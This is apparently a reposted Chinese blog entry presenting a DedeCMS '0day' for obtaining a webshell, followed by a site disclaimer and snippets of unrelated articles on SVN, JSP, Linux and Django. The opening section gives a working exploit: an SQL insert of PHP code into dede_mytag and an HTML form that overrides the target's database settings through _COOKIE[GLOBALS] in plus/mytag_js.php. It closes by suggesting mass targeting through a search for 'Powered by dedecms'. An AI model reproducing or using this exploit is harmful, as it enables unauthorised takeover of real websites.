dedecms织梦最新0day

拿webshell的方法如下: 网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell. 前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}''); 再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 <form action="" method="post" name="QuickSearch" id="QuickSearch" οnsubmit="addaction();"> <input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /> <input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br /> <input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br /> <input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br /> <input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br /> <input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br /> <input type="text" value="true" name="nocache" style="width:400"> <input type="submit" value="提交" name="QuickSearchBtn"><br /> </form> <script> function addaction() { document.QuickSearch.action=document.QuickSearch.doaction.value; } </script> 至于批量的方法自己去 谷歌搜索 "Powered by dedecms"

转载于:https://www.cnblogs.com/mrjim/archive/2011/08/12/4475237.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/462531.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

JSP注释方法

<html><head><title>注释</title></head><body><!-- --> 这些是显示注释&#xff0c;不在页面中显示&#xff0c;但可以在客户端HTML源文件中看到&#xff0c;会被JSP引擎解释<!--例如&#xff1a;本文件加载日期为<%new …

《统计学习方法》(李航)读书笔记(转)

《统计学习方法》(李航)读书笔记(转) http://www.cnblogs.com/limitlessun/p/8611103.html#_label4阅读目录 知识点感知机k近邻法朴素贝叶斯决策树logistic回归和最大熵模型支持向量机提升方法EM算法隐马尔可夫模型(HMM)统计学习方法总结神经网络K-MeansBaggingApriori降维方法…

Windows 关闭进程例子

HANDLE handle CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);PROCESSENTRY32* info new PROCESSENTRY32;info->dwSize sizeof(PROCESSENTRY32);if(Process32First(handle,info)){if(GetLastError()ERROR_NO_MORE_FILES){TRACE("进程查找初始化失败&#xff01;&…

【转】Linux/ubuntu下apache+svn安装配置

Author:gaojinbo Time:2010-8-30 优点&#xff1a; 可以通过apache记录svn操作相关日志 环境&#xff1a; ubuntu 10.04.1 lts 64bit apache2.2 1.安装相关包 apt-get install apache2 libapache2-svn subversion cronolog 2.建立一个svn库 mkdir -p /www/svn/ svnadmin create…

SVN源码

SVN源码&#xff1a;http://code.google.com/p/tortoisesvn/source/browse/

html奇淫技巧 2 教你如何进行图文环绕布局 原创

在群里无意看到了盆友想要布局一个图文环绕的布局&#xff0c;问有没有什么办法实现&#xff0c;上网查了下&#xff0c;都感觉忽悠人的。 js 方面学的不怎么好&#xff0c;但是页面这块是不服输的。 于是就进行了研究&#xff0c;需求如下&#xff1a; 起先看到这张需求我是有…

Lync与Exchange 2013 UM集成:Lync Server配置

在完成了对Exchange的UM功能进行配置之后&#xff0c;我们要把UM的功能与Lync做集成的话还需要在Lync这边做一些配置。首先我们打开Lync前端服务器&#xff0c;然后打开核心组件安装目录下的Support文件夹&#xff0c;然后双击OcsUmUtil。打开之后我们单击加载数据&#xff0c;…

Windows下安装配置SubVersion的简明步骤

Windows下安装配置SubVersion的简明步骤 [使用的安装程序和文档说明] svn-1.4.0-setup.exe&#xff1a;Subversion服务端1.4.0安装程序&#xff1b; SubService.rar: SubServe服务Windows辅助工具; TortoiseSVN-1.4.0.7501-win32-svn-1.4.0.msi: 推荐使用的一个Windows资源管理…

LINUX-关机 (系统的关机、重启以及登出 )

shutdown -h now 关闭系统(1) init 0 关闭系统(2) telinit 0 关闭系统(3) shutdown -h hours:minutes & 按预定时间关闭系统 shutdown -c 取消按预定时间关闭系统 shutdown -r now 重启(1) reboot 重启(2) logout 注销 转载于:https://www.cnblogs.com/a-ant/p/10896448.ht…

在ubuntu中为程序添加图标快捷键

2019独角兽企业重金招聘Python工程师标准>>> 比如我在我的ubuntu上安装了javaEE eclipse&#xff0c;这个软件直接解压就可以用&#xff0c;这时在导航栏里没有对应图标&#xff0c;在左上角的软件中心中也没有图标&#xff0c;每次启动它得用命令来启动&#xff0c…

django--通过model拿到字段对象

import os os.environ.setdefault("DJANGO_SETTINGS_MODULE", "autoserver.settings")import django django.setup()from repository import modelsclsmodels.Disk #拿到所有的字段对象 for i in cls._meta.fields:print(i.name,i.verbose_name)#字段的名字…

FTP 和HTTP

http://zhidao.baidu.com/question/4917179.html FTP下载和HTTP下载有何不同&#xff1f; 互联网上有很多可以下载各种各样好用工具的站点。在这些站点下载文件时&#xff0c;您是否因需要选择“HTTP下载”和“FTP下载”而感到过不知所措呢&#xff1f;两者间究竟有什么区别呢&…

更改消息存储的位置

2019独角兽企业重金招聘Python工程师标准>>> 更改消息存储的位置 将消息存储位置更改为另一目录或文件系统。 开始之前 记录部署至要配置的集群的 IBM Lotus Connections 功能部件。 关于此任务 集群成员多于一个节点时&#xff0c;消息存储必须对集群中位于相同物…

【原创】StreamInsight查询系列(三)——基本查询操作之过滤

上篇博文介绍了如何在LINQPad中输出StreamInsight查询结果。这篇文章将主要介绍StreamInsight基础查询操作中的过滤部分。 测试数据准备 为了方便测试查询&#xff0c;我们首先准备一个静态的测试数据源&#xff1a;var weatherData new[] {new { Timestamp new DateTime(201…

(转)基于svnserve的服务器,权限文件authz配置的常见问题及解答

最近在我用Subversion论坛(http://www.iUseSVN.com/bbs)经常有人提到这样的问题&#xff1a;为什么我的客户端没有写权限&#xff1f;为什么我的权限没有起作用&#xff1f;总结他们的配置&#xff0c;发现都是用svnserve作为服务器&#xff0c;都在svnserve.conf中使用了authz…

设计模式之四(抽象工厂模式第二回合)

前言 在第一回合中留下的问题&#xff0c;http://www.cnblogs.com/aehyok/archive/2013/05/19/3087497.html&#xff0c;现在就先处理一个简单的&#xff0c;只添加一个Department表。 第二回合 首先要建立部门类&#xff0c;假设只有两个字段部门ID&#xff0c;和部门名称。 p…

第一章-起步

1、安装python3环境 windows&#xff1a; 到python官网下载python3安装包&#xff0c;下载地址&#xff1a;https://www.python.org/ftp/python/3.7.3/python-3.7.3-amd64.exe 双击安装运行即可&#xff0c;注意&#xff1a;需要勾选add python 3.7 to path linux&#xff1a; …

js操作json数据的一些感受

最近在搞 json 数据传输,直接用的 javascript 对数据进行操作。json数据为&#xff1a; var json { "global":"200", "camera":[{"key2":"F5.6","key3":"35mm" }], "jam":[ {"Red"…

SVN1.6.5详细配置

提示大家&#xff1a;sc cretate命令后面带的参数比如[binPath ]的等号后面必须有个空格&#xff0c;没空格你怎么折腾都不行的&#xff0c;哈哈。微软还真搞笑啊&#xff0c;搞这么个功能迷惑人。同样&#xff0c;后面的其它参数比如group , displayname的等号后面都需要空格&…

ASP.NET 4.0升级至ASP.NET 4.5需要注意的地方

原文 http://www.cnblogs.com/dudu/archive/2013/05/20/3087791.html 原以为只要在Visual Studio 2012中将每个项目的Target framework设置为.NET Framewor 4.5进行编译&#xff0c;然后在web.config中设置compilation的targetFramework为4.5&#xff0c;就升级到了ASP.NET 4.5…